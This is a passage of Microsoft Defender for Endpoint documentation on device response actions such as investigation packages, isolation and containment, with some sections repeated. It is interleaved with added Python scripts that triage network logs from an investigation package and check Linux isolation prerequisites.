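        print(f"{n} inbound drop(s) from {src} to port {port}")
```

The firewall parser reads the column names from the log's own `#Fields:` line rather than hard-coding positions, so it keeps working if the log was configured with a different field set; the netstat parser treats UDP rows specially because they have no State column, which is the usual cause of off-by-one mistakes when splitting this output.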

The collection packages for macOS and Linux devices contain the following:

Object: macOS / Linux

Applications
  macOS: A list of all installed applications
  Linux: Not applicable

Disk volume
  macOS: Amount of free space; list of all mounted disk volumes; list of all partitions
  Linux: Amount of free space; list of all mounted disk volumes; list of all partitions

File
  macOS: A list of all open files with the corresponding processes using these files
  Linux: A list of all open files with the corresponding processes using these files

History
  macOS: Shell history
  Linux: Not applicable

Kernel modules
  macOS: All loaded modules
  Linux: Not applicable

Network connections
  macOS: Active connections; active listening connections; ARP table; firewall rules;
  interface configuration; proxy settings; VPN settings
  Linux: Active connections; active listening connections; ARP table; firewall rules;
  IP list; proxy settings

Processes
  macOS: A list of all running processes
  Linux: A list of all running processes

Services and scheduled tasks
  macOS: Certificates; configuration profiles; hardware information
  Linux: CPU details; hardware information; operating system information

System security information
  macOS: Extensible Firmware Interface (EFI) integrity information; firewall status;
  Malware Removal Tool (MRT) information; System Integrity Protection (SIP) status
  Linux: Not applicable

Users and groups
  macOS: Login history; sudoers
  Linux: Login history; sudoers

Run Microsoft Defender Antivirus scan on devices

As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.

) Important

This action is supported for macOS and Linux for client version 101.98.84 and
above. You can also use live response to run the action. For more information
on live response, see Investigate entities on devices using live response.
A Microsoft Defender Antivirus scan can run alongside other antivirus
solutions, whether Microsoft Defender Antivirus is the active antivirus solution
or not. Microsoft Defender Antivirus can be in Passive mode. For more
information, see Microsoft Defender Antivirus compatibility.

Once you have selected Run antivirus scan, select the scan type that you'd like to run
(quick or full) and add a comment before confirming the scan.

The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.

7 Note

When triggering a scan using Defender for Endpoint response action, Microsoft
Defender antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU
impact of the scan. If ScanAvgCPULoadFactor is not configured, the default value is
a limit of 50% maximum CPU load during a scan. For more information, see
configure-advanced-scan-types-microsoft-defender-antivirus.

Restrict app execution

In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.

) Important

This action is available for devices on Windows 10, version 1709 or later,
Windows 11, and Windows Server 2019 or later.
This feature is available if your organization uses Microsoft Defender Antivirus.
This action needs to meet the Windows Defender Application Control code
integrity policy formats and signing requirements. For more information, see
Code integrity policy formats and signing.

To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft-issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.

7 Note

You'll be able to reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment
and select Confirm. The Action center shows the action details, and the device
timeline includes a new event.

Notification on device user

When an app is restricted, the following notification is displayed to inform the user that
an app is being restricted from running:

7 Note

The notification is not available on Windows Server 2016 and Windows Server 2012
R2.

Isolate devices from the network

Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.

) Important

Isolating devices from the network is supported for macOS for client version
101.98.84 and above. You can also use live response to run the action. For
more information on live response, see Investigate entities on devices using
live response.
Full isolation is available for devices running Windows 11, Windows 10,
version 1703 or later, Windows Server 2022, Windows Server 2019, Windows
Server 2016, and Windows Server 2012 R2.
You can use the device isolation capability on all supported Microsoft
Defender for Endpoint on Linux versions listed in System requirements. Ensure that
the following prerequisites are enabled: iptables, ip6tables, and a Linux kernel
with CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, and
CONFIG_IP_NF_MATCH_OWNER.
Selective isolation is available for devices running Windows 10, version 1709
or later, and Windows 11.
When isolating a device, only certain processes and destinations are allowed.
Therefore, devices that are behind a full VPN tunnel won't be able to reach
the Microsoft Defender for Endpoint cloud service after the device is isolated.
We recommend using a split-tunneling VPN for Microsoft Defender for
Endpoint and Microsoft Defender Antivirus cloud-based protection-related
traffic.
The feature supports VPN connections.
You must have at least one of the following role permissions: 'Active remediation
actions'. For more information, see Create and manage roles.
You must have access to the device based on the device group settings. For
more information, see Create and manage device groups.
Exclusions are not supported for macOS and Linux isolation.
An isolated device is removed from isolation when an administrator modifies
or adds an iptables rule on the isolated device.
Isolating a server running on Microsoft Hyper-V blocks network traffic to all
child virtual machines of the server.

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.

On Windows 10, version 1709 or later, you'll have more control over the network
isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for
Business connectivity (also known as 'Selective isolation').

7 Note

You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select
Confirm. The Action center shows the action details, and the device timeline includes
a new event.

7 Note

The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate to the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.

Forcibly release device from isolation

The device isolation feature is an invaluable tool for safeguarding devices against
external threats. However, there are instances when isolated devices become
unresponsive. There's a downloadable script for these instances that you can run to
forcibly release devices from isolation. The script is available through a link in the UI.

7 Note

Admins and users with the 'Manage security settings in Security Center' permission
can forcibly release devices from isolation.
The script is valid for the specific device only.
The script expires in three days.

To forcibly release a device from isolation:

1. On the device page, select Download script to force-release a device from
isolation from the action menu.
2. In the wizard on the right-hand side, select Download script.

Minimum requirements

The minimum requirements for the 'forcibly release device from isolation' feature are:

Supports only Windows.
The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB5023773
Windows 11 version 21H2, all editions with KB5023774
Windows 11 version 22H2, all editions with KB5023778

Notification on device user

When a device is being isolated, the following notification is displayed to inform the
user that the device is being isolated from the network:

7 Note

The notification is not available on non-Windows platforms.

Contain devices from the network

When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
contain a device, every Microsoft Defender for Endpoint onboarded device will block
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.

7 Note

Blocking incoming and outgoing communication with a 'contained' device is
supported on onboarded Microsoft Defender for Endpoint Windows 10 and
Windows Server 2019+ devices.

How to contain a device

1. Go to the Device inventory page and select the device to contain.

2. Select Contain device from the actions menu in the device flyout.

3. On the contain device popup, type a comment, and select Confirm.

Contain a device from the device page

A device can also be contained from the device page by selecting Contain device from
the action bar:

7 Note

It can take up to 5 minutes for the details about a newly contained device to reach
Microsoft Defender for Endpoint onboarded devices.

) Important

If a contained device changes its IP address, then all Microsoft Defender for
Endpoint onboarded devices will recognize this and start blocking
communications with the new IP address. The original IP address will no
longer be blocked (it can take up to 5 minutes to see these changes).
In cases where the contained device's IP is used by another device on the
network, there will be a warning while containing the device, with a link to
advanced hunting (with a pre-populated query). This will provide visibility into
the other devices using the same IP, to help you make a conscious decision
about whether to continue with containing the device.
In cases where the contained device is a network device, a warning will appear
with a message that this may cause network connectivity issues (for example,
containing a router that is acting as a default gateway). At this point, you'll be
able to choose whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify that the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.

Stop containing a device

You'll be able to stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.

2. Select Release from containment from the action menu. This action will restore
this device's connection to the network.

Contain user from the network

When an identity in your network might be compromised, you must prevent that
identity from accessing the network and different endpoints. Defender for Endpoint can
"contain" an identity, blocking it from access and helping prevent attacks, specifically
ransomware. When an identity is contained, any supported Microsoft Defender for
Endpoint onboarded device will block incoming traffic in specific protocols related to
attacks (network logons, RPC, SMB, RDP) while allowing legitimate traffic. This action
can significantly help to reduce the impact of an attack. When an identity is contained,
security operations analysts have extra time to locate, identify, and remediate the threat
to the compromised identity.

7 Note

Blocking incoming communication with a "contained" user is supported on
onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense
version 8740 and higher), Windows Server 2019+ devices, and Windows Server
2012 R2 and 2016 with the modern agent.

How to contain a user

Currently, containing users is only available automatically by using automatic attack
disruption. When Microsoft detects a user as being compromised, a "Contain User"
policy is automatically set.

View the contain user actions

After a user is contained, you can view the action in the History view of the Action
center. Here, you can see when the action occurred, and which users in your
organization were contained.

Furthermore, after an identity is considered "contained", that user will be blocked by
Defender for Endpoint and cannot perform any malicious lateral movement or remote
encryption on or to any supported Defender for Endpoint onboarded device. These
blocks will show up as alerts to help you quickly see the devices the compromised user
attempted to access and the potential attack techniques.

Undo contain user actions


You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action Center. In the side pane select Undo
2. Select the user from either the user inventory, Incident page side pane or alert side
pane and select Undo

This action will restore this user's connection to the network.

Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the blocked
actions by the compromised user. In the Device timeline view, you can see information
about specific events, including protocol and interface granularity, and the relevant
MITRE technique associated with it.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the individual blocking events related to Contain User in your tenant, dive deeper into
the context of each block, and extract the different entities and techniques associated
with those events.

Consult a threat expert

You can consult a Microsoft threat expert for more insights regarding a potentially
compromised device or already compromised ones. Microsoft Threat Experts can be
engaged directly from within Microsoft Defender XDR for timely and accurate
response. Experts provide insights not just about a potentially compromised device, but
also help you understand complex threats, the targeted attack notifications you receive,
the alerts, or the threat intelligence context shown on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file.
You'll be able to view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, for example, submission date/time, submitting
user, and if the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender for Business

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Quickly respond to detected attacks by isolating devices or collecting an investigation
package. After taking action on devices, you can check activity details on the Action
center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

Run antivirus scan
Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file

Microsoft Defender for Business does not include the "Stop and quarantine a file"
action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the
response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.

Initiate Automated Investigation

You can start a new general purpose automated investigation on the device if needed.
While an investigation is running, any other alert generated from the device will be
added to an ongoing Automated investigation until that investigation is completed. In
addition, if the same threat is seen on other devices, those devices are added to the
investigation.

For more information on automated investigations, see Overview of Automated
investigations.

Initiate live response session

Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic
data, run scripts, send suspicious entities for analysis, remediate threats, and proactively
hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live
response.

Collect investigation package from devices

As part of the investigation or response process, you can collect an investigation
package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top
of the device page.

2. Specify in the text box why you want to perform this action. Select Confirm.

3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the
device page.

2. Add comments and select Confirm.

3. Select Action center from the response actions section of the device page.

4. Click the Package collection package available to download the collection
package.

For Windows devices, the package contains the following folders:

Autoruns - Contains a set of files that each represent the content of the registry of a
known auto start entry point (ASEP) to help identify the attacker's persistence on the
device. NOTE: If the registry key is not found, the file will contain the following
message: "ERROR: The system was unable to find the specified registry key or value."

Installed programs - This .CSV file contains the list of installed programs that can help
identify what is currently installed on the device. For more information, see
Win32_Product class.

Network connections - This folder contains a set of data points related to the
connectivity information that can help in identifying connectivity to suspicious URLs,
the attacker's command and control (C&C) infrastructure, any lateral movement, or
remote connections.
ActiveNetConnections.txt - Displays protocol statistics and current TCP/IP network
connections. Provides the ability to look for suspicious connectivity made by a process.
Arp.txt - Displays the current address resolution protocol (ARP) cache tables for all
interfaces. The ARP cache can reveal other hosts on a network that have been
compromised or suspicious systems on the network that might have been used to run
an internal attack.
DnsCache.txt - Displays the contents of the DNS client resolver cache, which includes
both entries preloaded from the local Hosts file and any recently obtained resource
records for name queries resolved by the computer. This can help in identifying
suspicious connections.
IpConfig.txt - Displays the full TCP/IP configuration for all adapters. Adapters can
represent physical interfaces, such as installed network adapters, or logical interfaces,
such as dial-up connections.
FirewallExecutionLog.txt and pfirewall.log - NOTE: The pfirewall.log file must exist in
%windir%\system32\logfiles\firewall\pfirewall.log so that it is included in the
investigation package. For more information on creating the firewall log file, see
Configure the Windows Defender Firewall with Advanced Security Log.

Prefetch files - Windows Prefetch files are designed to speed up the application startup
process. They can be used to track all the files recently used in the system and find
traces of applications that might have been deleted but can still be found in the
prefetch file list.
Prefetch folder - Contains a copy of the prefetch files from %SystemRoot%\Prefetch.
NOTE: It is suggested to download a prefetch file viewer to view the prefetch files.
PrefetchFilesList.txt - Contains the list of all the copied files, which can be used to
track whether there were any copy failures to the prefetch folder.

Processes - Contains a .CSV file listing the running processes and provides the ability
to identify current processes running on the device. This can be useful when identifying
a suspicious process and its state.

Scheduled tasks - Contains a .CSV file listing the scheduled tasks, which can be used to
identify routines performed automatically on a chosen device to look for suspicious
code that was set to run automatically.

Security event log - Contains the security event log, which contains records of login or
logout activity, or other security-related events specified by the system's audit policy.
NOTE: Open the event log file using Event Viewer.

Services - Contains a .CSV file that lists services and their states.

Windows Server Message Block (SMB) sessions - Lists shared access to files, printers,
and serial ports and miscellaneous communications between nodes on a network. This
can help identify data exfiltration or lateral movement. Contains files for
SMBInboundSessions and SMBOutboundSession. NOTE: If there are no sessions (inbound
or outbound), you'll get a text file that tells you that there are no SMB sessions found.

System Information - Contains a SystemInformation.txt file that lists system
information such as OS version and network cards.

Temp Directories - Contains a set of text files that list the files located in %Temp% for
every user in the system. This can help to track suspicious files that an attacker may
have dropped on the system. NOTE: If the file contains the following message: "The
system cannot find the path specified", it means that there is no temp directory for
this user, which might be because the user didn't log in to the system.

Users and Groups - Provides a list of files that each represent a group and its members.

WdSupportLogs - Provides the MpCmdRunLog.txt and MPSupportFiles.cab. NOTE: This
folder will only be created on Windows 10, version 1709 or later with the February 2020
update rollup or more recent installed:
Win10 1709 (RS3) Build 16299.1717: KB4537816
Win10 1803 (RS4) Build 17134.1345: KB4537795
Win10 1809 (RS5) Build 17763.1075: KB4537818
Win10 1903/1909 (19h1/19h2) Builds 18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls - This file is a summary of the investigation package
collection. It contains the list of data points, the command used to extract the data,
the execution status, and the error code if there is a failure. You can use this report
to track whether the package includes all the expected data and identify if there were
any errors.
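Two of the files in the Network connections folder, ActiveNetConnections.txt and DnsCache.txt, can be cross-referenced offline once the package is unpacked. The Python script below is an added example, not Microsoft code and not part of the investigation package: it parses both files, keeps established connections to non-internal addresses, and attaches the DNS name the device resolved to each address, so a process talking to a literal IP with no cached name stands out. It assumes the file layouts match netstat -ano and ipconfig /displaydns output (the page describes the contents, not the exact format), the sample text is constructed, and the RFC 1918, loopback and link-local ranges treated as internal are an assumption to adjust to your own addressing plan.

```python
"""Triage the "Network connections" folder of a Defender for Endpoint investigation package.

Added example, not Microsoft code. Parses ActiveNetConnections.txt (assumed netstat -ano
layout) and DnsCache.txt (assumed ipconfig /displaydns layout) from the unpacked Zip and
lists established connections to non-internal addresses with the cached DNS name, if any.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of ActiveNetConnections.txt (netstat -ano layout); not real data.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.5:49712         203.0.113.10:443       ESTABLISHED     4120
  TCP    10.0.0.5:49813         192.0.2.77:4444        ESTABLISHED     6112
  TCP    10.0.0.5:50120         10.0.0.9:445           ESTABLISHED     4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  UDP    0.0.0.0:500            *:*                                    1180
"""

# Constructed sample of DnsCache.txt (ipconfig /displaydns layout); not real data.
SAMPLE_DNSCACHE = """\
Windows IP Configuration

    update.contoso.example
    ----------------------------------------
    Record Name . . . . . : update.contoso.example
    Record Type . . . . . : 1
    Time To Live  . . . . : 3600
    Data Length . . . . . : 4
    Section . . . . . . . : Answer
    A (Host) Record . . . : 203.0.113.10
"""

# Ranges treated as "internal" here (RFC 1918, loopback, link-local): an assumption,
# adjust to your own addressing plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fe80::/10")]


@dataclass
class Connection:
    proto: str
    local: str
    remote_ip: str
    remote_port: int
    state: str
    pid: int
    dns_name: Optional[str] = None


# netstat -ano row: Proto, Local, Foreign, optional State (UDP rows have none), PID.
NETSTAT_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")
DNS_NAME = re.compile(r"^\s*Record Name[\s.]*:\s*(\S+)\s*$")
DNS_ADDR = re.compile(r"^\s*(?:A \(Host\)|AAAA) Record[\s.]*:\s*(\S+)\s*$")


def parse_netstat(text: str) -> List[Connection]:
    """Parse connection rows; headers, blank lines and statistics lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_ROW.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        ip, _, port = foreign.rpartition(":")  # handles [::1]:443 as well as 1.2.3.4:443
        conns.append(Connection(proto, local, ip.strip("[]"),
                                int(port) if port.isdigit() else 0,
                                state or "", int(pid)))
    return conns


def parse_dnscache(text: str) -> Dict[str, str]:
    """Map each cached A/AAAA answer address back to the name that was queried."""
    names: Dict[str, str] = {}
    current = None
    for line in text.splitlines():
        m = DNS_NAME.match(line)
        if m:
            current = m.group(1)
            continue
        m = DNS_ADDR.match(line)
        if m and current:
            names[m.group(1)] = current
    return names


def is_internal(ip: str) -> bool:
    """Wildcards ("*") and addresses inside INTERNAL_NETS are not worth flagging."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True
    return any(addr in net for net in INTERNAL_NETS)


def triage(netstat_text: str, dns_text: str) -> List[Connection]:
    """Established connections to non-internal addresses, enriched with cached DNS names."""
    dns = parse_dnscache(dns_text)
    out = []
    for c in parse_netstat(netstat_text):
        if c.state != "ESTABLISHED" or is_internal(c.remote_ip):
            continue
        c.dns_name = dns.get(c.remote_ip)
        out.append(c)
    return out


def unresolved(conns: List[Connection]) -> List[Connection]:
    """Connections with no name in the resolver cache: the process used a literal IP."""
    return [c for c in conns if c.dns_name is None]


if __name__ == "__main__":
    for c in triage(SAMPLE_NETSTAT, SAMPLE_DNSCACHE):
        print(f"PID {c.pid:>5}  {c.remote_ip}:{c.remote_port:<5}  {c.dns_name or '(no cached name)'}")
```

Against a real package, pass the contents of the two files to triage(); a PID that appears in unresolved() is worth looking up in the Processes .CSV from the same package, and the remote address can then be checked against the DeviceNetworkEvents data for the device.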

The collection packages for macOS and Linux devices contain the following:

Applications
macOS: A list of all installed applications
Linux: Not applicable

Disk volume
macOS: Amount of free space; list of all mounted disk volumes; list of all partitions
Linux: Amount of free space; list of all mounted disk volumes; list of all partitions

File
macOS: A list of all open files with the corresponding processes using these files
Linux: A list of all open files with the corresponding processes using these files

History
macOS: Shell history
Linux: Not applicable

Kernel modules
macOS: All loaded modules
Linux: Not applicable

Network connections
macOS: Active connections; active listening connections; ARP table; firewall rules;
interface configuration; proxy settings; VPN settings
Linux: Active connections; active listening connections; ARP table; firewall rules;
IP list; proxy settings

Processes
macOS: A list of all running processes
Linux: A list of all running processes

Services and scheduled tasks
macOS: Certificates; configuration profiles; hardware information
Linux: CPU details; hardware information; operating system information

System security information
macOS: Extensible Firmware Interface (EFI) integrity information; firewall status;
Malware Removal Tool (MRT) information; System Integrity Protection (SIP) status
Linux: Not applicable

Users and groups
macOS: Login history; sudoers
Linux: Login history; sudoers

Run Microsoft Defender Antivirus scan on devices

As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.

Important

This action is supported for macOS and Linux for client version 101.98.84 and above.
You can also use live response to run the action. For more information on live
response, see Investigate entities on devices using live response.
A Microsoft Defender Antivirus scan can run alongside other antivirus solutions,
whether Microsoft Defender Antivirus is the active antivirus solution or not. Microsoft
Defender Antivirus can be in Passive mode. For more information, see Microsoft
Defender Antivirus compatibility.

Once you have selected Run antivirus scan, select the scan type that you'd like to run
(quick or full) and add a comment before confirming the scan.

The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.

Note

When triggering a scan using a Defender for Endpoint response action, the Microsoft
Defender Antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU
impact of the scan. If ScanAvgCPULoadFactor is not configured, the default value is
a limit of 50% maximum CPU load during a scan. For more information, see
configure-advanced-scan-types-microsoft-defender-antivirus.

Restrict app execution

In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.

Important

This action is available for devices on Windows 10, version 1709 or later, Windows 11,
and Windows Server 2019 or later.
This feature is available if your organization uses Microsoft Defender Antivirus.
This action needs to meet the Windows Defender Application Control code integrity
policy formats and signing requirements. For more information, see Code integrity
policy formats and signing.

To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.

Note

You'll be able to reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment
and select Confirm. The Action center will show the scan information and the device
timeline will include a new event.

Notification on device user

When an app is restricted, the following notification is displayed to inform the user that
an app is being restricted from running.

Note

The notification is not available on Windows Server 2016 and Windows Server 2012
R2.

Isolate devices from the network

Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.

Important

Isolating devices from the network is supported for macOS for client version 101.98.84
and above. You can also use live response to run the action. For more information on
live response, see Investigate entities on devices using live response.
Full isolation is available for devices running Windows 11, Windows 10, version 1703
or later, Windows Server 2022, Windows Server 2019, Windows Server 2016 and
Windows Server 2012 R2.
You can use the device isolation capability on all supported Microsoft Defender for
Endpoint on Linux versions listed in System requirements. Ensure that the following
prerequisites are enabled: iptables, ip6tables, and a Linux kernel with
CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, and CONFIG_IP_NF_MATCH_OWNER.
Selective isolation is available for devices running Windows 10, version 1709 or later,
and Windows 11.
When isolating a device, only certain processes and destinations are allowed. Therefore,
devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender
for Endpoint cloud service after the device is isolated. We recommend using a
split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender
Antivirus cloud-based protection-related traffic.
The feature supports VPN connection.
You must have at least one of the following role permissions: 'Active remediation
actions'. For more information, see Create and manage roles.
You must have access to the device based on the device group settings. For more
information, see Create and manage device groups.
Exclusion for both macOS and Linux isolation is not supported.
An isolated device is removed from isolation when an administrator modifies or adds a
new iptables rule to the isolated device.
Isolating a server running on Microsoft Hyper-V blocks network traffic to all child
virtual machines of the server.

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.
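The Linux prerequisites listed above (iptables, ip6tables, and the three kernel options) can be checked on a host before an isolation is attempted, rather than discovered when the action fails. The script below is an added example, not Microsoft code: it parses a kernel configuration in the /boot/config-<release> layout and reports which required options and tools are missing. Assumptions: the running kernel's config is at /boot/config-<kernel release> (distributions differ), an option built as a module (=m) is treated as satisfying the requirement, the sample config is constructed, and the function names are mine.

```python
"""Check the Linux device-isolation prerequisites from a kernel config file.

Added example, not Microsoft code. Reads a config in the /boot/config-<release> layout
and reports which of the required kernel options are absent or disabled, and which of
the required userland tools are not on PATH. Treating "=m" as enabled is an assumption.
"""
import platform
import re
import shutil
from typing import Dict, List

REQUIRED_KCONFIG = ("CONFIG_NETFILTER", "CONFIG_IP_NF_IPTABLES",
                    "CONFIG_IP_NF_MATCH_OWNER")
REQUIRED_TOOLS = ("iptables", "ip6tables")

# Constructed excerpt in /boot/config-* layout; not taken from a real kernel.
SAMPLE_CONFIG = """\
# Automatically generated file; DO NOT EDIT.
CONFIG_NETFILTER=y
CONFIG_IP_NF_IPTABLES=m
# CONFIG_IP_NF_MATCH_OWNER is not set
CONFIG_IP6_NF_IPTABLES=m
"""

KCONFIG_SET = re.compile(r"^(CONFIG_\w+)=(\S.*?)\s*$")
KCONFIG_UNSET = re.compile(r"^# (CONFIG_\w+) is not set\s*$")


def parse_kconfig(text: str) -> Dict[str, str]:
    """Return option -> value. A '# X is not set' line is recorded as 'n'."""
    opts: Dict[str, str] = {}
    for line in text.splitlines():
        m = KCONFIG_SET.match(line)
        if m:
            opts[m.group(1)] = m.group(2)
            continue
        m = KCONFIG_UNSET.match(line)
        if m:
            opts[m.group(1)] = "n"
    return opts


def missing_kconfig(opts: Dict[str, str]) -> List[str]:
    """Required options that are neither built in (y) nor a module (m); absent counts as missing."""
    return [o for o in REQUIRED_KCONFIG if opts.get(o) not in ("y", "m")]


def missing_tools(which=shutil.which) -> List[str]:
    """Required userland tools not found on PATH; the lookup is injectable for testing."""
    return [t for t in REQUIRED_TOOLS if which(t) is None]


def isolation_prereqs(config_text: str, which=shutil.which) -> Dict[str, List[str]]:
    """Summarise what is missing; two empty lists mean the listed prerequisites are met."""
    return {"kernel": missing_kconfig(parse_kconfig(config_text)),
            "tools": missing_tools(which)}


if __name__ == "__main__":
    path = f"/boot/config-{platform.release()}"  # assumed location of the running kernel's config
    try:
        with open(path) as fh:
            text = fh.read()
    except OSError:
        text = SAMPLE_CONFIG  # fall back to the constructed sample when no config is readable
    for kind, items in isolation_prereqs(text).items():
        print(f"missing {kind}: {items or 'none'}")
```

Because an administrator adding or changing an iptables rule releases the device from isolation (see the note above), the same tool inventory is a useful thing to record at isolation time, so that any later rule change on the host can be explained.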

On Windows 10, version 1709 or later, you'll have more control over the network
isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for
Business connectivity (a.k.a 'Selective Isolation').

Note

You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select
Confirm. The Action center will show the scan information and the device timeline will
include a new event.

Note

The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate to the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.

Forcibly release device from isolation

The device isolation feature is an invaluable tool for safeguarding devices against
external threats. However, there are instances when isolated devices become
unresponsive. There's a downloadable script for these instances that you can run to
forcibly release devices from isolation. The script is available through a link in the UI.

Note

Admins and users with the 'Manage security settings in Security Center' permission can
forcibly release devices from isolation.
The script is valid for the specific device only.
The script will expire in three days.

To forcibly release a device from isolation:

1. On the device page, select Download script to force-release a device from
isolation from the action menu.
2. On the right-hand side wizard, select Download script.

Minimum requirements

The minimum requirements for the 'forcibly release device from isolation' feature are:

Supports only Windows
The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB5023773
Windows 11 version 21H2, all editions with KB5023774
Windows 11 version 22H2, all editions with KB5023778

Notification on device user

When a device is being isolated, the following notification is displayed to inform the
user that the device is being isolated from the network.

Note

The notification is not available on non-Windows platforms.

Contain devices from the network

When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
contain a device, any Microsoft Defender for Endpoint onboarded device will block
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.

Note

Blocking incoming and outgoing communication with a 'contained' device is supported
on onboarded Microsoft Defender for Endpoint Windows 10 and Windows Server 2019+
devices.

How to contain a device

1. Go to the Device inventory page and select the device to contain.

2. Select Contain device from the actions menu in the device flyout.

3. On the contain device popup, type a comment, and select Confirm.

Contain a device from the device page

A device can also be contained from the device page by selecting Contain device from
the action bar.

Note

It can take up to 5 minutes for the details about a newly contained device to reach
Microsoft Defender for Endpoint onboarded devices.

Important

